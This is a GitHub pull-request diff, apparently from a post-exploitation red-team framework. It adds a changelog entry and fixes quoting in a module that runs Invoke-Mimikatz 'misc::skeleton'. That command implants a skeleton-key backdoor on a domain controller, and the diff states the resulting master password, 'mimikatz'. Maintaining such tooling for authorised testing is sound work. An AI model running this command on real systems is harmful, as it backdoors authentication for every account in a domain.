Skip to content
Open
Show file tree
Hide file tree
Changes from 1 commit
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions CHANGELOG.md
Original file line number Diff line number Diff line change
Expand Up @@ -21,6 +21,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
### Fixed

- Fixed stop-job handlers in PowerShell and Python agents crashing when the target job doesn't exist
- Fixed misc_skeleton_key Invoke-Mimikatz call

## [6.4.1] - 2026-02-15
- Fixed the `docs/quickstart/installation/README.md` file to specify a previously missing reference to Ubuntu
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -40,5 +40,5 @@ options:
required: true
value: ''
script_path: credentials/Invoke-Mimikatz.ps1
script_end: Invoke-Mimikatz -Command "'misc::skeleton'"; 'Skeleton key implanted.
script_end: Invoke-Mimikatz -Command '"misc::skeleton"'; 'Skeleton key implanted.
Use password mimikatz for access.'
Loading